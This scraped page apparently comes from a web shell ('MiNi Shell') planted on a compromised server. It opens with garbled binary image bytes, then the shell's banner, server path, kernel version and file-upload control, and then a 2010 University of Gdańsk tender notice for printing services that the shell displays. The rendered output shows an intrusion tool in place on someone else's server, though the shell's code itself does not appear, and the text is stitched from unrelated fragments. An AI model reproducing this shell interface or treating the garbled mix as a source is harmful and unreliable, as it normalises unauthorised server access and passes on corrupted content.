JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100215/42274-N-2010.html

<p class="kh_header"><b>Gdańsk: I   część - sukcesywna usługa druku gazety uniwersyteckiej  dla  Uniwersytetu   Gdańskiego.
II    część  - druk informatora  z zasadami rekrutacji na rok 2011/2012  i druk składu osobowego dla Uniwersytetu Gdańskiego.
III   część -  druk katalogu wystawców na rok 2011/2012 dla Uniwersytetu Gdańskiego.
IV   część -  druk broszur i  ulotek dla Uniwersytetu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 42274 - 2010; data zamieszczenia: 15.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> I   część - sukcesywna usługa druku gazety uniwersyteckiej  dla  Uniwersytetu   Gdańskiego.
II    część  - druk informatora  z zasadami rekrutacji na rok 2011/2012  i druk składu osobowego dla Uniwersytetu Gdańskiego.
III   część -  druk katalogu wystawców na rok 2011/2012 dla Uniwersytetu Gdańskiego.
IV   część -  druk broszur i  ulotek dla Uniwersytetu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I   część -  Sukcesywna usługa druku gazety uniwersyteckiej (czasopismo)  dla  Uniwersytetu Gdańskiego.
                       -   format  200x280 (po obcięciu)
                       -   papier (środki)dwustronnie kredowany - matowy o     gramaturze  nie mniej niż 115g na m2,
                       -   28 stron środka ,  szyty,   druk offsetowy,   dwukolorowy
                       -   okładka  papier dwustronnie kredowany - folia błysk, jednostronnie - zewnętrzne okładki  o  gramaturze nie mniej niż 200g na m2,   4 strony , pełen kolor
  -   kolory środka będą stałe, tj. czarny oraz Pantone 1807                      
 -   termin wykonania zamówienia  -  4 dni od dnia odebrania materiałów od Zamawiającego                   

II  część  

1.	  Druk informatora  z zasadami rekrutacji na rok 2011-2012 dla UG.

Nakład: 10 000 sztuk
Format: A5 
Objętość: środek - 130 stron (maksymalnie 150 stron w zależności od ilości nowych kierunków ), okładka - 4 strony
Druk środka:  kolor 2 przez 2 , kolor PANTON nr 3015C i czarny (tekst)
Zawartość środka:  tekst, tabele
Materiał środka: papier offset 90 g 
Druk okładki: kolor 4 przez 0 (CMYK)
Zawartość okładki:  tekst, logo, zdjęcia
Materiał okładki: kreda matowa 300 g
Uszlachetnienie okładki: folia matowa po zewnętrznej stronie (1 i 4 strona okładki)
Oprawa: miękka, klejona na gorąco po dłuższym boku
Konfekcjonowanie:  informatory pakowane w kartony po 50 egzemplarzy. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 

2.	Druk Składu osobowego Uniwersytetu Gdańskiego na kadencję 2008-2012.
Nakład: 1000 sztuk
Format: 110 na 115 mm 
Objętość: środek - 200 stron (ilość szacunkowa), okładka - 4 strony
Druk środka:  kolor 2 na 2 .
Zawartość środka:  tekst
Materiał środka: papier offset 90 g 
Druk okładki: kolor 4 na 0 
Zawartość okładki:  tekst, logo
Materiał okładki: kreda matowa 300 g
Uszlachetnienie okładki: folia matowa po zewnętrznej stronie (1 i 4 strona okładki)
Oprawa: miękka, klejona na gorąco po dłuższym boku
Konfekcjonowanie:  - informatory pakowane w kartony po 50 egzemplarzy. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 
Projekt  Składu osobowego UG  leży po stronie Zamawiającego.

 III część   druk katalogu wystawców na rok 2011- 2012 dla Uniwersytetu Gdańskiego.

Nakład - 3000 egz
Format - A5
Kolorystyka :
   - okładka - 4 na 4 + lakier UV
   - środki 1 na 1.Kolor środka czarny. Kolor CMYKA 4 na 4.
Papier :
   - okładka 200g+ lakier UV
   -  środki offset 80g + wklejki kreda 115g - kolor 4 na 4
Oprawa klejona
Objętość: 92+4 ( w tym 8-10 stron wklejka reklama - kreda) - łączna liczba stron może być ? 10 str. Osiem kartek dwustronnych. Kartki umieszczone będą tuż za okładką oraz na końcu katalogu.


IV  część -  druk broszur i  ulotek dla Uniwersytetu Gdańskiego.

1. Druk broszury edukacyjno-informacyjnej  Bałtycki morświn.
Nakład: 5 000 sztuk.

Format:  A5 x 16 str. (oprawa zeszytowa na 2 zszywki)
Papier:  kreda błyszcząca 150 g
Zawartość: tekst, zdjęcia, logo
Kolorystyka: 4 na 4 (druk dwustronny)
Konfekcjonowanie:  broszury pakowane w paczki. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 
Projekt ulotek leży po stronie Zamawiającego; 
- Zamawiający dostarczy materiały do wydruku w formie plików PDF;
- oferent potwierdzi mailowo prawidłowość graficzną przygotowanych materiałów, nie później niż 5 dni roboczych od daty przesłania materiałów do druku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
   
1.	Załącznik nr  2 - oświadczenie  Wykonawcy dotyczące art. 22 ust 1 oraz art. 24 ust 1 i 2 ustawy,  podpisane przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.
 W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną   ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu.
     2.      Aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust 1 pkt 2  ustawy. 
             W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia moga ubiegać sie Wykonawcy, którzy spełniaja warunki dotyczące: 
1) Posiadaja uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl; http//pdzp.univ.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Uniwersytetu Gdańskiego; 80-952 Gdańsk-Oliwa, ul. Bażyńskiego 1A , pokój nr 122, I pietro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2010 godzina 11:00, miejsce: Dział Zamówień Publicznych Uniwersytetu Gdańskiego; 80-952 Gdańsk-Oliwa, ul. bażyńskiego 1A, pokój nr 122, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna usługa druku gazety uniwersyteckiej dla Uniwersytetu Gdańskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I   część -  Sukcesywna usługa druku gazety uniwersyteckiej (czasopismo)  dla  Uniwersytetu Gdańskiego.
                       -   format  200x280 (po obcięciu)
                       -   papier (środki)dwustronnie kredowany - matowy o  gramaturze  nie mniej niż 115g/m2,
                       -   28 stron środka ,  szyty,   druk offsetowy,   dwukolorowy
                       -   okładka  papier dwustronnie kredowany - folia błysk, jednostronnie - zewnętrzne okładki  o  gramaturze nie mniej niż 200g/m2,   4 strony , pełen kolor
  -   kolory środka będą stałe, tj. czarny oraz Pantone 1807                      
 -   termin wykonania zamówienia  -  4 dni od dnia odebrania materiałów od Zamawiającego                   
Cena zawiera koszt druku, okładek, impozycji, blach drukarskich (CTP) i introligatorni.
Należy podać wyraźnie rozróżnione i cenę jednostkową za 1egzemplarz i cenę nakładu jednego wydania gazety i cenę wydania całego nakładu wszystkich wydań w wyżej wymienionym okresie. 
Stawka VAT musi być zgodna z obowiązującym prawem wydawniczym i skarbowym.
Czasopismo posiada nadany numer ISSN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk informatora z zasadami rekrutacjina rok 2011-2012 dla Uniwersytetu Gdańskiego.
Druk  Składu osobowego Uniwersytetu gdańskiego na kadencję 2008-2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	  Druk informatora  z zasadami rekrutacji na rok 2011-2012 dla UG.

Nakład: 10 000 sztuk
Format: A5 
Objętość: środek - 130 stron (maksymalnie 150 stron w zależności od ilości nowych kierunków ), okładka - 4 strony
Druk środka:  kolor 2 na 2 , kolor PANTON nr 3015C i czarny (tekst)
Zawartość środka:  tekst, tabele
Materiał środka: papier offset 90 g 
Druk okładki: kolor 4 na 0 (CMYK)
Zawartość okładki:  tekst, logo, zdjęcia
Materiał okładki: kreda matowa 300 g
Uszlachetnienie okładki: folia matowa po zewnętrznej stronie (1 i 4 strona okładki)
Oprawa: miękka, klejona na gorąco po dłuższym boku
Konfekcjonowanie:  informatory pakowane w kartony po 50 egzemplarzy. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 

Projekt informatora leży po stronie Zamawiającego; 
Zamawiający dostarczy materiały do wydruku (okładkę i środek informatora) w formie pliku PDF;
Wykonawca potwierdzi mailowo prawidłowość graficzną przygotowanych materiałów, nie później niż 5 dni roboczych od daty przesłania materiałów do druku.

Termin realizacji zamówienia :

Dwie dostawy: 

a) 50% zamówienia - dostawa 2 tygodnie od daty przekazania ostatecznych projektów do Wykonawcy(przekazanie projektów nastąpi maksymalnie do 30 lipca 2010)
b) 50% zamówienia - dostawa maksymalnie do 30 listopada 2010

Dostawa: Rektorat Uniwersytetu Gdańskiego, Biuro Rekrutacji, ul. Bażyńskiego 1A, 80 -952 Gdańsk .

2.	Druk  Składu osobowego Uniwersytetu Gdańskiego na kadencję 2008-2012.
Nakład: 1000 sztuk
Format: 110 na 115 mm 
Objętość: środek - 200 stron (ilość szacunkowa), okładka - 4 strony
Druk środka:  kolor 2 na 2 .
Zawartość środka:  tekst
Materiał środka: papier offset 90 g 
Druk okładki: kolor 4 na 0 
Zawartość okładki:  tekst, logo
Materiał okładki: kreda matowa 300 g
Uszlachetnienie okładki: folia matowa po zewnętrznej stronie (1 i 4 strona okładki)
Oprawa: miękka, klejona na gorąco po dłuższym boku
Konfekcjonowanie:  - informatory pakowane w kartony po 50 egzemplarzy. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 
Projekt  Składu osobowego UG  leży po stronie Zamawiającego; 
Zamawiający dostarczy materiały do wydruku (okładkę i środek  Składu osobowego ) w formie pliku PDF;
Wykonawca potwierdzi mailowo prawidłowość graficzną przygotowanych materiałów, nie później niż 5 dni roboczych od daty przesłania materiałów do druku.

Termin realizacji zamówienia :   do dnia 26.03.2010r. od daty przekazania ostatecznych projektów do Wykonawcy.
Dostawa: Rektorat Uniwersytetu Gdańskiego, Dział Organizacyjny , ul. Bażyńskiego 1A, 80 -952 Gdańsk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Druk katalogu wystawców na rok 2011-2012 dla Uniwersytetu Gdańskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nakład - 3000 egz
Format - A5
Kolorystyka :
   - okładka - 4/4 + lakier UV
   - środki 1/1.Kolor środka czarny. Kolor CMYKA 4/4.
Papier :
   - okładka 200g+ lakier UV
   -  środki offset 80g + wklejki kreda 115g - kolor 4/4
Oprawa klejona
Objętość: 92+4 ( w tym 8-10 stron wklejka reklama/kreda) - łączna liczba stron może być ? 10 str. Osiem kartek dwustronnych. Kartki umieszczone będą tuż za okładką oraz na końcu katalogu.

Termin realizacji:  do 16 marca 2010.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Druk broszur i ulotek dla Uniwersytetu Gdańskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Druk broszury edukacyjno-informacyjnej  Bałtycki morświn .
Nakład: 5 000 sztuk.

Format:  A5 x 16 str. (oprawa zeszytowa na 2 zszywki)
Papier:  kreda błyszcząca 150 g
Zawartość: tekst, zdjęcia, logo
Kolorystyka: 4 na 4 (druk dwustronny)
Konfekcjonowanie:  broszury pakowane w paczki. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 
Projekt ulotek leży po stronie Zamawiającego; 
- Zamawiający dostarczy materiały do wydruku w formie plików PDF;
- oferent potwierdzi mailowo prawidłowość graficzną przygotowanych materiałów, nie później niż 5 dni roboczych od daty przesłania materiałów do druku.

Termin realizacji zamówienia do 15 maja 2010.
Dostawa do Instytutu Oceanografii  Uniwersytetu Gdańskiego ; Gdynia ul. Piłsudzkiego 46.

2.  druk ulotek edukacyjno-informacyjnej  U nas nałowisz  
Nakład: 5 000 sztuk.
Format:  A4 łamany do A5 
Papier:  kreda błyszcząca 250 g
Zawartość: tekst, zdjęcia, logo
Kolorystyka: 4na 4 (druk dwustronny)
Konfekcjonowanie:  ulotki pakowane w paczki. Opakowanie powinno zabezpieczyć wyrób przed obniżeniem jego jakości w czasie transportu. 
- projekt ulotek leży po stronie Zamawiającego; 
- Zamawiający dostarczy materiały do wydruku w formie plików PDF;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com